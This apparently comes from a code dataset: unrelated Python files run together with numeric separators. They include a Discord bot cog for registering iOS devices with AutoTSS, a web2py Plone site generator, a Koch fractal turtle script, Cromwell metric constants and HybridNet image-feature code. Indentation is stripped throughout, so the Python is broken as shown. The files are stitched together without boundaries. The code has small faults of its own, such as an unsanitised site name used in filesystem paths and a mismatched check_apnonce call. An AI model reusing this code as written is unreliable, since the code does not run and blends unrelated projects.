cnn_model, dfcnn_shared_params_return, dfcnn_TS_params_return, cnn_TS_params_return, cnn_select_params_return, cnn_output_dim = new_darts_dfcnn_net(net_input, k_sizes, ch_sizes, stride_sizes, dfcnn_KB_sizes, dfcnn_TS_sizes, dfcnn_TS_stride_sizes, activation_fn=cnn_activation_fn, dfcnn_TS_activation_fn=dfcnn_TS_activation_fn, dfcnn_KB_params=dfcnn_KB_params, dfcnn_TS_params=dfcnn_TS_params, cnn_TS_params=cnn_TS_params, select_params=select_params, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_sizes=pool_sizes, dropout=dropout, dropout_prob=dropout_prob, flat_output=True, trainable=trainable, task_index=task_index, skip_connections=skip_connections, use_numpy_var_in_graph=use_numpy_var_in_graph)
fc_model, fc_params_return = new_fc_net(cnn_model[-1], fc_sizes, activation_fn=fc_activation_fn, params=fc_params, output_type=output_type, use_numpy_var_in_graph=use_numpy_var_in_graph)
return (cnn_model+fc_model, dfcnn_shared_params_return, dfcnn_TS_params_return, cnn_TS_params_return, cnn_select_params_return, fc_params_return)
| 76,894 | 30,880 |
from aioify import aioify
from discord.ext import commands
import aiofiles
import aiohttp
import aiosqlite
import asyncio
import discord
import json
import shutil
class Device(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.shutil = aioify(shutil, name='shutil')
self.utils = self.bot.get_cog('Utils')
@commands.group(name='device', invoke_without_command=True)
@commands.guild_only()
async def device_cmd(self, ctx: commands.Context) -> None:
prefix = await self.utils.get_prefix(ctx.guild.id)
embed = discord.Embed(title='Device Commands')
embed.add_field(name='Add a device', value=f'`{prefix}device add`', inline=False)
embed.add_field(name='Remove a device', value=f'`{prefix}device remove`', inline=False)
embed.add_field(name='List your devices', value=f'`{prefix}device list`', inline=False)
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await ctx.send(embed=embed)
@device_cmd.command(name='add')
@commands.guild_only()
@commands.max_concurrency(1, per=commands.BucketType.user)
async def add_device(self, ctx: commands.Context) -> None:
prefix = await self.utils.get_prefix(ctx.guild.id)
timeout_embed = discord.Embed(title='Add Device', description='No response given in 1 minute, cancelling.')
cancelled_embed = discord.Embed(title='Add Device', description='Cancelled.')
for embed in (timeout_embed, cancelled_embed):
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
max_devices = 10 #TODO: Export this option to a separate config file
async with aiosqlite.connect('Data/autotss.db') as db, db.execute('SELECT devices from autotss WHERE user = ?', (ctx.author.id,)) as cursor:
try:
devices = json.loads((await cursor.fetchone())[0])
except TypeError:
devices = list()
await db.execute('INSERT INTO autotss(user, devices, enabled) VALUES(?,?,?)', (ctx.author.id, json.dumps(devices), True))
await db.commit()
if len(devices) > max_devices and await ctx.bot.is_owner(ctx.author) == False: # Error out if you attempt to add over 'max_devices' devices, and if you're not the owner of the bot
embed = discord.Embed(title='Error', description=f'You cannot add over {max_devices} devices to AutoTSS.')
await ctx.send(embed=embed)
return
device = dict()
async with aiohttp.ClientSession() as session:
for x in range(4): # Loop that gets all of the required information to save blobs with from the user
descriptions = (
'Enter a name for your device',
"Enter your device's identifier (e.g. `iPhone6,1`)",
"Enter your device's ECID (hex)",
"Enter your device's Board Config (e.g. `n51ap`). \
This value ends in `ap`, and can be found with [System Info](https://arx8x.github.io/depictions/systeminfo.html) \
under the `Platform` section, or by running `gssc | grep HWModelStr` in a terminal on your iOS device."
)
embed = discord.Embed(title='Add Device', description='\n'.join((descriptions[x], 'Type `cancel` to cancel.')))
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
if x == 0:
message = await ctx.send(embed=embed)
else:
await message.edit(embed=embed)
# Wait for a response from the user, and error out if the user takes over 1 minute to respond
try:
response = await self.bot.wait_for('message', check=lambda message: message.author == ctx.author, timeout=60)
if x == 0:
answer = response.content # Don't make the device's name lowercase
else:
answer = response.content.lower()
except asyncio.exceptions.TimeoutError:
await message.edit(embed=timeout_embed)
return
# Delete the message
try:
await response.delete()
except discord.errors.NotFound:
pass
if answer.lower() == 'cancel' or answer.startswith(prefix):
await message.edit(embed=cancelled_embed)
return
# Make sure given information is valid
if x == 0:
device['name'] = answer
name_check = await self.utils.check_name(device['name'], ctx.author.id)
if name_check != True:
embed = discord.Embed(title='Error', description = f"Device name `{device['name']}` is not valid.")
if name_check == 0:
embed.description += " A device's name must be between 4 and 20 characters."
elif name_check == -1:
embed.description += " You cannot use a device's name more than once."
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
return
elif x == 1:
device['identifier'] = 'P'.join(answer.split('p'))
if await self.utils.check_identifier(session, device['identifier']) is False:
embed = discord.Embed(title='Error', description=f"Device Identifier `{device['identifier']}` is not valid.")
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
return
elif x == 2:
if answer.startswith('0x'):
device['ecid'] = answer[2:]
else:
device['ecid'] = answer
ecid_check = await self.utils.check_ecid(device['ecid'], ctx.author.id)
if ecid_check != True:
embed = discord.Embed(title='Error', description=f"Device ECID `{device['ecid']}` is not valid.")
embed.set_footer(text=f'{ctx.author.display_name} | This message will be censored in 5 seconds to protect your ECID(s).', icon_url=ctx.author.avatar_url_as(static_format='png'))
if ecid_check == -1:
embed.description += ' This ECID has already been added to AutoTSS.'
await message.edit(embed=embed)
embed.description = embed.description.replace(f"`{device['ecid']}` ", '')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await asyncio.sleep(5)
await message.edit(embed=embed)
return
else:
device['boardconfig'] = answer
if await self.utils.check_boardconfig(session, device['identifier'], device['boardconfig']) is False:
embed = discord.Embed(title='Error', description=f"Device boardconfig `{device['boardconfig']}` is not valid.")
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
return
cpid = await self.utils.get_cpid(session, device['identifier'], device['boardconfig'])
generator_description = [
'Would you like to save blobs with a custom generator?',
'*If being ran on A12+ devices, you **will** need to provide a matching apnonce for SHSH blobs to be saved correctly.*',
'Guide for jailbroken A12+ devices: [Click here](https://ios.cfw.guide/tss-web#getting-generator-and-apnonce-jailbroken-a12-only)',
'Guide for nonjailbroken A12+ devices: [Click here](https://ios.cfw.guide/tss-computer#get-your-device-specific-apnonce-and-generator)',
'This value is hexadecimal, 16 characters long, and begins with `0x`.'
]
embed = discord.Embed(title='Add Device', description='\n'.join(generator_description)) # Ask the user if they'd like to save blobs with a custom generator
embed.add_field(name='Options', value='Type **yes** to add a custom generator, **cancel** to cancel adding this device, or anything else to skip.', inline=False)
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
try:
response = await self.bot.wait_for('message', check=lambda message: message.author == ctx.author, timeout=60)
answer = response.content.lower()
except asyncio.exceptions.TimeoutError:
await message.edit(embed=timeout_embed)
return
try:
await response.delete()
except discord.errors.NotFound:
pass
if answer == 'yes':
embed = discord.Embed(title='Add Device', description='Please enter the custom generator you wish to save blobs with.\nType `cancel` to cancel.')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
try:
response = await self.bot.wait_for('message', check=lambda message: message.author == ctx.author, timeout=60)
answer = response.content.lower()
except asyncio.exceptions.TimeoutError:
await message.edit(embed=timeout_embed)
return
try:
await response.delete()
except discord.errors.NotFound:
pass
if answer == 'cancel' or answer.startswith(prefix):
await message.edit(embed=cancelled_embed)
return
else:
device['generator'] = answer
if await self.utils.check_generator(device['generator']) is False:
embed = discord.Embed(title='Error', description=f"Device Generator `{device['generator']}` is not valid.")
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
return
elif answer == 'cancel' or answer.startswith(prefix):
await message.edit(embed=cancelled_embed)
return
else:
device['generator'] = None
apnonce_description = [
'Would you like to save blobs with a custom apnonce?',
]
if device['generator'] is not None:
apnonce_description.append(f"This custom apnonce MUST match with your custom generator `{device['generator']}`, or else your SHSH blobs **will be invalid**.")
if cpid >= 32800:
if len(apnonce_description) == 2:
a12_apnonce_desc = 'This also MUST be done for your device, or else your SHSH blobs **will be invalid**. More info \
[here](https://www.reddit.com/r/jailbreak/comments/f5wm6l/tutorial_repost_easiest_way_to_save_a12_blobs/).'
else:
a12_apnonce_desc = 'This MUST be done for your device, or else your SHSH blobs **will be invalid**. More info \
[here](https://www.reddit.com/r/jailbreak/comments/f5wm6l/tutorial_repost_easiest_way_to_save_a12_blobs/).'
apnonce_description.append(a12_apnonce_desc)
apnonce_description.append('NOTE: This is **NOT** the same as your **generator**, which is hex, begins with `0x`, and is 16 characters long.')
embed = discord.Embed(title='Add Device', description='\n'.join(apnonce_description)) # Ask the user if they'd like to save blobs with a custom ApNonce
embed.add_field(name='Options', value='Type **yes** to add a custom apnonce, **cancel** to cancel adding this device, or anything else to skip.', inline=False)
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
try:
response = await self.bot.wait_for('message', check=lambda message: message.author == ctx.author, timeout=60)
answer = response.content.lower()
except asyncio.exceptions.TimeoutError:
await message.edit(embed=timeout_embed)
return
try:
await response.delete()
except discord.errors.NotFound:
pass
if answer == 'yes':
embed = discord.Embed(title='Add Device', description='Please enter the custom apnonce you wish to save blobs with.\nType `cancel` to cancel.')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
try:
response = await self.bot.wait_for('message', check=lambda message: message.author == ctx.author, timeout=60)
answer = response.content.lower()
except asyncio.exceptions.TimeoutError:
await message.edit(embed=timeout_embed)
return
try:
await response.delete()
except discord.errors.NotFound:
pass
if answer == 'cancel' or answer.startswith(prefix):
await message.edit(embed=cancelled_embed)
return
else:
device['apnonce'] = answer
if await self.utils.check_apnonce(cpid, device['apnonce']) is False:
embed = discord.Embed(title='Error', description=f"Device ApNonce `{device['apnonce']}` is not valid.")
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
return
elif answer == 'cancel' or answer.startswith(prefix):
await message.edit(embed=cancelled_embed)
return
else:
device['apnonce'] = None
if 32800 <= cpid < 35072 and device['apnonce'] is None: # If A12+ and no apnonce was specified
embed = discord.Embed(title='Add Device')
apnonce_warning = (
'You are attempting to add an A12+ device while choosing to not specify a custom apnonce.',
'This will save **non-working SHSH blobs**.',
'Are you sure you want to do this?'
)
embed.add_field(name='Warning', value='\n'.join(apnonce_warning), inline=False)
embed.add_field(name='Options', value='Type **yes** to go back and add a custom apnonce, **cancel** to cancel adding this device, or anything else to skip.', inline=False)
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
try:
response = await self.bot.wait_for('message', check=lambda message: message.author == ctx.author, timeout=60)
answer = response.content.lower()
except asyncio.exceptions.TimeoutError:
await message.edit(embed=timeout_embed)
return
try:
await response.delete()
except discord.errors.NotFound:
pass
if answer == 'yes':
embed = discord.Embed(title='Add Device', description='Please enter the custom apnonce you wish to save blobs with.\nType `cancel` to cancel.')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
try:
response = await self.bot.wait_for('message', check=lambda message: message.author == ctx.author, timeout=60)
answer = response.content.lower()
except asyncio.exceptions.TimeoutError:
await message.edit(embed=timeout_embed)
return
try:
await response.delete()
except discord.errors.NotFound:
pass
if answer == 'cancel' or answer.startswith(prefix):
await message.edit(embed=cancelled_embed)
return
else:
device['apnonce'] = answer
if await self.utils.check_apnonce(device['apnonce']) is False:
embed = discord.Embed(title='Error', description=f"Device ApNonce `{device['apnonce']}` is not valid.")
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
return
elif answer == 'cancel' or answer.startswith(prefix):
await message.edit(embed=cancelled_embed)
return
else:
device['apnonce'] = None
device['saved_blobs'] = list()
# Add device information into the database
devices.append(device)
async with aiosqlite.connect('Data/autotss.db') as db:
await db.execute('UPDATE autotss SET devices = ? WHERE user = ?', (json.dumps(devices), ctx.author.id))
await db.commit()
embed = discord.Embed(title='Add Device', description=f"Device `{device['name']}` added successfully!")
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
await self.utils.update_device_count()
@device_cmd.command(name='remove')
@commands.guild_only()
@commands.max_concurrency(1, per=commands.BucketType.user)
async def remove_device(self, ctx: commands.Context) -> None:
prefix = await self.utils.get_prefix(ctx.guild.id)
cancelled_embed = discord.Embed(title='Remove Device', description='Cancelled.')
invalid_embed = discord.Embed(title='Error', description='Invalid input given.')
timeout_embed = discord.Embed(title='Remove Device', description='No response given in 1 minute, cancelling.')
for x in (cancelled_embed, invalid_embed, timeout_embed):
x.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
async with aiosqlite.connect('Data/autotss.db') as db, db.execute('SELECT devices from autotss WHERE user = ?', (ctx.author.id,)) as cursor:
try:
devices = json.loads((await cursor.fetchone())[0])
except TypeError:
devices = list()
if len(devices) == 0:
embed = discord.Embed(title='Error', description='You have no devices added to AutoTSS.')
await ctx.send(embed=embed)
return
embed = discord.Embed(title='Remove Device', description="Choose the number of the device you'd like to remove.\nType `cancel` to cancel.")
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
for x in range(len(devices)):
device_info = [
f"Name: `{devices[x]['name']}`",
f"Device Identifier: `{devices[x]['identifier']}`",
f"Boardconfig: `{devices[x]['boardconfig']}`"
]
if devices[x]['apnonce'] is not None:
device_info.append(f"Custom ApNonce: `{devices[x]['apnonce']}`")
embed.add_field(name=x + 1, value='\n'.join(device_info), inline=False)
message = await ctx.send(embed=embed)
try:
response = await self.bot.wait_for('message', check=lambda message: message.author == ctx.author, timeout=60)
answer = response.content.lower()
except asyncio.exceptions.TimeoutError:
await message.edit(embed=timeout_embed)
return
try:
await response.delete()
except:
pass
if answer == 'cancel' or answer.startswith(prefix):
await message.edit(embed=cancelled_embed)
return
try:
num = int(answer) - 1
except:
await message.edit(embed=invalid_embed)
return
if num not in range(len(devices)):
await message.edit(embed=invalid_embed)
return
embed = discord.Embed(title='Remove Device', description=f"Are you **absolutely sure** you want to delete `{devices[num]['name']}`?")
embed.add_field(name='Options', value='Type **yes** to delete your device & blobs from AutoTSS, or anything else to cancel.', inline=False)
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
try:
response = await self.bot.wait_for('message', check=lambda message: message.author == ctx.author, timeout=60)
answer = response.content.lower()
except asyncio.exceptions.TimeoutError:
await message.edit(embed=timeout_embed)
return
try:
await response.delete()
except discord.errors.NotFound:
pass
if answer == 'yes':
embed = discord.Embed(title='Remove Device', description='Removing device...')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
async with aiofiles.tempfile.TemporaryDirectory() as tmpdir:
url = await self.utils.backup_blobs(tmpdir, devices[num]['ecid'])
if url is None:
embed = discord.Embed(title='Remove Device', description=f"Device `{devices[num]['name']}` removed.")
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
else:
await self.shutil.rmtree(f"Data/Blobs/{devices[num]['ecid']}")
embed = discord.Embed(title='Remove Device')
embed.description = f"Blobs from `{devices[num]['name']}`: [Click here]({url})"
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
try:
await ctx.author.send(embed=embed)
embed.description = f"Device `{devices[num]['name']}` removed."
await message.edit(embed=embed)
except:
embed.description = f"Device `{devices[num]['name']}` removed.\nBlobs from `{devices[num]['name']}`: [Click here]({url})"
embed.set_footer(
text=f'{ctx.author.display_name} | This message will automatically be deleted in 15 seconds to protect your ECID(s).',
icon_url=ctx.author.avatar_url_as(static_format='png')
)
await message.edit(embed=embed)
await asyncio.sleep(15)
await ctx.message.delete()
await message.delete()
devices.pop(num)
async with aiosqlite.connect('Data/autotss.db') as db:
await db.execute('UPDATE autotss SET devices = ? WHERE user = ?', (json.dumps(devices), ctx.author.id))
await db.commit()
await message.edit(embed=embed)
await self.utils.update_device_count()
else:
await message.edit(embed=cancelled_embed)
@device_cmd.command(name='list')
@commands.guild_only()
async def list_devices(self, ctx: commands.Context) -> None:
async with aiosqlite.connect('Data/autotss.db') as db, db.execute('SELECT devices from autotss WHERE user = ?', (ctx.author.id,)) as cursor:
try:
devices = json.loads((await cursor.fetchone())[0])
except TypeError:
devices = list()
if len(devices) == 0:
embed = discord.Embed(title='Error', description='You have no devices added to AutoTSS.')
await ctx.send(embed=embed)
return
embed = discord.Embed(title=f"{ctx.author.display_name}'s Devices")
for device in devices:
device_info = [
f"Device Identifier: `{device['identifier']}`",
f"ECID: ||`{device['ecid']}`||",
f"Boardconfig: `{device['boardconfig']}`"
]
if device['generator'] is not None:
device_info.append(f"Custom generator: `{device['generator']}`")
if device['apnonce'] is not None:
device_info.append(f"Custom ApNonce: `{device['apnonce']}`")
embed.add_field(name=f"`{device['name']}`", value='\n'.join(device_info), inline=False)
embed.set_footer(text=f'{ctx.author.display_name} | This message will be censored in 10 seconds to protect your ECID(s).', icon_url=ctx.author.avatar_url_as(static_format='png'))
message = await ctx.send(embed=embed)
await asyncio.sleep(10)
for x in range(len(embed.fields)):
field_values = [value for value in embed.fields[x].value.split('\n') if 'ECID' not in value]
embed.set_field_at(index=x, name=embed.fields[x].name, value='\n'.join(field_values), inline=False)
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
def setup(bot):
bot.add_cog(Device(bot))
| 22,303 | 8,444 |
### SITE PLONE
import os, sys
import xml.etree.cElementTree as tree_element_first
@auth.requires_membership('admin')
def add():
"""
MÉTODO RESPONSÁVEL POR GERAR O SKELETON DE UM SITE PLONE
@dir /sites/prodam.gerenciador.<project_name>/src/prodam/gerenciador/<project_name>/
"""
if request.post_vars.site:
site = request.post_vars.site
folders = ['sites','/viewlets','/browser','/src','/templates']
try:
project_name = "prodam.gerenciador."+str(site)
path = folders[0]
path += "/"+str(project_name)
os.mkdir(path, 0755 ); # plone name site
path += folders[3]
os.mkdir(path, 0755 ); # directory src
#split do nome do site separado por .
directories = project_name.split(".")
for directory in directories:
path += "/"+directory
os.mkdir(path, 0755 );
# profiles
profiles = path
os.mkdir(profiles+"/profiles", 0755);
os.mkdir(profiles+"/profiles/default/", 0755);
add_profile_file(path)
#browser
path += folders[2]
os.mkdir(path, 0755);
# viewlets
path += folders[1]
os.mkdir(path, 0755);
# zcml file
add_configure_file(path,project_name)
# python file configure
add_viewlets_file(path)
# templates
path += folders[4]
os.mkdir(path, 0755);
# pt file
add_template_file(path)
except:
raise HTTP(500, T('Ocorreu um erro...'))
else:
site = None
lista = os.listdir("sites/")
return dict(lista=lista,site=site)
def add_configure_file(path,project_name,param1='IPortalHeader',param2='IProdamPortal'):
"""
MÉTODO RESPONSÁVEL POR GERAR O ARQUIVO ZCML
"""
#seta nó para configuração dos namespaces
configure = tree_element_first.Element('configure')
configure.set('xmlns','http://namespaces.zope.org/zope')
configure.set('xmlns:browser','http://namespaces.zope.org/browser')
configure.set('i18n_domain','prodam.portal')
#seta nó para configuração das Viewlets do Plone
browser = tree_element_first.SubElement(configure,"browser:viewlet")
browser.set("name","plone.logo")
browser.set("manager","plone.app.layout.viewlets.interfaces."+param1)
browser.set("class",".logo.LogoViewlet")
browser.set("permission","zope2.View")
browser.set("layer",project_name+".interfaces."+param2)
tree = tree_element_first.ElementTree(configure)
configure_name = "/configure.zcml"
indent(configure)
tree.write(path+configure_name,encoding="utf-8")
def add_template_file(path):
"""
MÉTODO RESPONSÁVEL POR GERAR O TEMPLATE alerta.pt
"""
text = open('sites/components/alerta.pt','r').read()
file_name = "alerta.pt"
file = open(path+"/"+file_name,"a+")
file.write(text)
file.close()
def add_profile_file(path):
"""
MÉTODO RESPONSÁVEL POR GERAR O PROFILE CONFIGURAÇÃO VIEWLET viewlets.xml
"""
#seta nó para configuração dos namespaces
xml_object = tree_element_first.Element('object')
tree = tree_element_first.ElementTree(xml_object)
configure_name = "/profiles/default/viewlets.xml"
indent(xml_object)
tree.write(path+configure_name,encoding="utf-8")
def add_viewlets_file(path):
"""
MÉTODO RESPONSÁVEL POR GERAR O viewlets.py
"""
file_name = "viewlets.py"
file = open(path+"/"+file_name,"a+")
file.close()
def indent(elem, level=0):
i = "\n" + level*" "
if len(elem):
if not elem.text or not elem.text.strip():
elem.text = i + " "
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
indent(elem, level+1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
def testando():
users = db(db.t_tbl_components).select()
return dict(users=users) | 3,725 | 1,513 |
import turtle
class fraktalKocha(turtle.Turtle):
def __init__(self):
super().__init__(shape='classic', visible=False)
def krzywaKocha(self, d, n):
self.pendown()
if n == 0:
self.forward(d)
else:
self.krzywaKocha(d/3, n-1)
self.left(60)
self.krzywaKocha(d/3, n-1)
self.right(120)
self.krzywaKocha(d/3, n-1)
self.left(60)
self.krzywaKocha(d/3, n-1)
self.penup()
def platekKocha(self, d, n):
for i in range(3):
self.krzywaKocha(d, n)
self.right(120)
kolory = ('#ffbd20', '#20bd20', '#ff3c00', '#f000ff', '#004aff')
xPlatek = (-400, -400, 200, 200, -100)
yPlatek = (-50, 250, 250, -50, 150)
f = fraktalKocha()
turtle.title('Krzywa Kocha')
f.home()
f.speed(0) # 0..10 - najszybciej 0
f.penup()
f.pensize(2)
f.clear()
for n in range(5):
# Legenda
f.pencolor(kolory[n])
f.goto(-450+(turtle.window_width()//5)*n, -380)
f.write('n = ', True, align="left", font=("Arial", 12, "normal"))
f.write(n, True, align="left", font=("Arial", 12, "normal"))
f.goto(-480, -350)
for n in range(5):
f.pencolor(kolory[n])
f.krzywaKocha(turtle.window_width()//5, n)
for n in range(5):
f.pencolor(kolory[n])
f.goto(xPlatek[n], yPlatek[n])
f.platekKocha(200, n) | 1,365 | 651 |
Attempt = "attempt"
CromwellAdditionalTotalTimeSeconds = "cromwellAdditionalTotalTimeSeconds"
CromwellEnd = "cromwellEnd"
CromwellStart = "cromwellStart"
CromwellTotalTimeSeconds = "cromwellTotalTimeSeconds"
DelocalizationTimeSeconds = "delocalizationTimeSeconds"
Disks = "disks"
DockerImagePullTimeSeconds = "dockerImagePullTimeSeconds"
LocalizationTimeSeconds = "localizationTimeSeconds"
MachineType = "machineType"
OperationId = "operationId"
OtherTimeSeconds = "otherTimeSeconds"
PapiCreate = "papiCreate"
PapiEnd = "papiEnd"
PapiStart = "papiStart"
PapiTotalTimeSeconds = "papiTotalTimeSeconds"
ShardIndex = "shardIndex"
StartupTimeSeconds = "startupTimeSeconds"
UserCommandTimeSeconds = "userCommandTimeSeconds"
| 718 | 224 |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 5 15:34:18 2020
@author: mubariz
"""
import caffe
import numpy as np
import os
def compute_map_features(ref_map):
mean_npy = np.load(str(os.path.abspath(os.curdir))+'/VPR_Techniques/HybridNet/hybridnet_mean.npy')
print('Mean Array Shape:' + str(mean_npy.shape))
net = caffe.Net(str(os.path.abspath(os.curdir))+'/VPR_Techniques/HybridNet/deploy.prototxt',str(os.path.abspath(os.curdir))+'/VPR_Techniques/HybridNet/HybridNet.caffemodel', caffe.TEST)
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
print(net.blobs['data'].data.shape)
transformer.set_transpose('data', (2,0,1)) # move image channels to outermost dimension
transformer.set_mean('data', mean_npy) # subtract the dataset-mean value in each channel
transformer.set_raw_scale('data', 255) # rescale from [0, 1] to [0, 255]
transformer.set_channel_swap('data', (2,1,0)) # swap channels from RGB to BGR
ref_features=[]
features_ref_local=np.zeros((256,30))
for image_reference in ref_map:
image_reference = image_reference / 255.
image_reference = image_reference[:,:,(2,1,0)]
features_ref_local=np.zeros((256,30))
if(image_reference is not None):
transformed_image_ref = transformer.preprocess('data', image_reference)
net.blobs['data'].data[...] = transformed_image_ref.copy()
out = net.forward()
features_ref=np.asarray(net.blobs['conv5'].data)[1,:,:,:].copy()
for i in range(256):
#S=1
features_ref_local[i,0]=np.max(features_ref[i,:,:])
#S=2
features_ref_local[i,1]=np.max(features_ref[i,0:6,0:6])
features_ref_local[i,2]=np.max(features_ref[i,0:6,7:12])
features_ref_local[i,3]=np.max(features_ref[i,7:12,0:6])
features_ref_local[i,4]=np.max(features_ref[i,7:12,7:12])
#S=3
features_ref_local[i,5]=np.max(features_ref[i,0:4,0:4])
features_ref_local[i,6]=np.max(features_ref[i,0:4,5:8])
features_ref_local[i,7]=np.max(features_ref[i,0:4,9:12])
features_ref_local[i,8]=np.max(features_ref[i,5:8,0:4])
features_ref_local[i,9]=np.max(features_ref[i,5:8,5:8])
features_ref_local[i,10]=np.max(features_ref[i,5:8,9:12])
features_ref_local[i,11]=np.max(features_ref[i,9:12,0:4])
features_ref_local[i,12]=np.max(features_ref[i,9:12,5:8])
features_ref_local[i,13]=np.max(features_ref[i,9:12,9:12])
#S=4
features_ref_local[i,14]=np.max(features_ref[i,0:3,0:3])
features_ref_local[i,15]=np.max(features_ref[i,0:3,4:6])
features_ref_local[i,16]=np.max(features_ref[i,0:3,7:9])
features_ref_local[i,17]=np.max(features_ref[i,0:3,10:12])
features_ref_local[i,18]=np.max(features_ref[i,4:6,0:3])
features_ref_local[i,19]=np.max(features_ref[i,4:6,4:6])
features_ref_local[i,20]=np.max(features_ref[i,4:6,7:9])
features_ref_local[i,21]=np.max(features_ref[i,4:6,10:12])
features_ref_local[i,22]=np.max(features_ref[i,7:9,0:3])
features_ref_local[i,23]=np.max(features_ref[i,7:9,4:6])
features_ref_local[i,24]=np.max(features_ref[i,7:9,7:9])
features_ref_local[i,25]=np.max(features_ref[i,7:9,10:12])
features_ref_local[i,26]=np.max(features_ref[i,10:12,0:3])
features_ref_local[i,27]=np.max(features_ref[i,10:12,4:6])
features_ref_local[i,28]=np.max(features_ref[i,10:12,7:9])
features_ref_local[i,29]=np.max(features_ref[i,10:12,10:12])
# print(features_ref_local)
ref_features.append(features_ref_local)
print('Reference images descriptors computed!')
return ref_features
def compute_query_desc(image_query):
mean_npy = np.load(str(os.path.abspath(os.curdir))+'/VPR_Techniques/HybridNet/hybridnet_mean.npy')
print('Mean Array Shape:' + str(mean_npy.shape))
net = caffe.Net(str(os.path.abspath(os.curdir))+'/VPR_Techniques/HybridNet/deploy.prototxt',str(os.path.abspath(os.curdir))+'/VPR_Techniques/HybridNet/HybridNet.caffemodel', caffe.TEST)
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
print(net.blobs['data'].data.shape)
transformer.set_transpose('data', (2,0,1)) # move image channels to outermost dimension
transformer.set_mean('data', mean_npy) # subtract the dataset-mean value in each channel
transformer.set_raw_scale('data', 255) # rescale from [0, 1] to [0, 255]
transformer.set_channel_swap('data', (2,1,0)) # swap channels from RGB to BGR
features_query_local=np.zeros((256,30))
image_query = image_query / 255.
image_query = image_query[:,:,(2,1,0)]
if (image_query is not None):
transformed_image_query = transformer.preprocess('data', image_query)
net.blobs['data'].data[...] = transformed_image_query.copy()
out = net.forward()
features_query=np.asarray(net.blobs['conv5'].data)[1,:,:,:].copy()
features_query_local=np.zeros((256,30))
for i in range(256):
#S=1
features_query_local[i,0]=np.max(features_query[i,:,:])
#S=2
features_query_local[i,1]=np.max(features_query[i,0:6,0:6])
features_query_local[i,2]=np.max(features_query[i,0:6,7:12])
features_query_local[i,3]=np.max(features_query[i,7:12,0:6])
features_query_local[i,4]=np.max(features_query[i,7:12,7:12])
#S=3
features_query_local[i,5]=np.max(features_query[i,0:4,0:4])
features_query_local[i,6]=np.max(features_query[i,0:4,5:8])
features_query_local[i,7]=np.max(features_query[i,0:4,9:12])
features_query_local[i,8]=np.max(features_query[i,5:8,0:4])
features_query_local[i,9]=np.max(features_query[i,5:8,5:8])
features_query_local[i,10]=np.max(features_query[i,5:8,9:12])
features_query_local[i,11]=np.max(features_query[i,9:12,0:4])
features_query_local[i,12]=np.max(features_query[i,9:12,5:8])
features_query_local[i,13]=np.max(features_query[i,9:12,9:12])
#S=4
features_query_local[i,14]=np.max(features_query[i,0:3,0:3])
features_query_local[i,15]=np.max(features_query[i,0:3,4:6])
features_query_local[i,16]=np.max(features_query[i,0:3,7:9])
features_query_local[i,17]=np.max(features_query[i,0:3,10:12])
features_query_local[i,18]=np.max(features_query[i,4:6,0:3])
features_query_local[i,19]=np.max(features_query[i,4:6,4:6])
features_query_local[i,20]=np.max(features_query[i,4:6,7:9])
features_query_local[i,21]=np.max(features_query[i,4:6,10:12])
features_query_local[i,22]=np.max(features_query[i,7:9,0:3])
features_query_local[i,23]=np.max(features_query[i,7:9,4:6])
features_query_local[i,24]=np.max(features_query[i,7:9,7:9])
features_query_local[i,25]=np.max(features_query[i,7:9,10:12])
features_query_local[i,26]=np.max(features_query[i,10:12,0:3])
features_query_local[i,27]=np.max(features_query[i,10:12,4:6])
features_query_local[i,28]=np.max(features_query[i,10:12,7:9])
features_query_local[i,29]=np.max(features_query[i,10:12,10:12])
return features_query_local
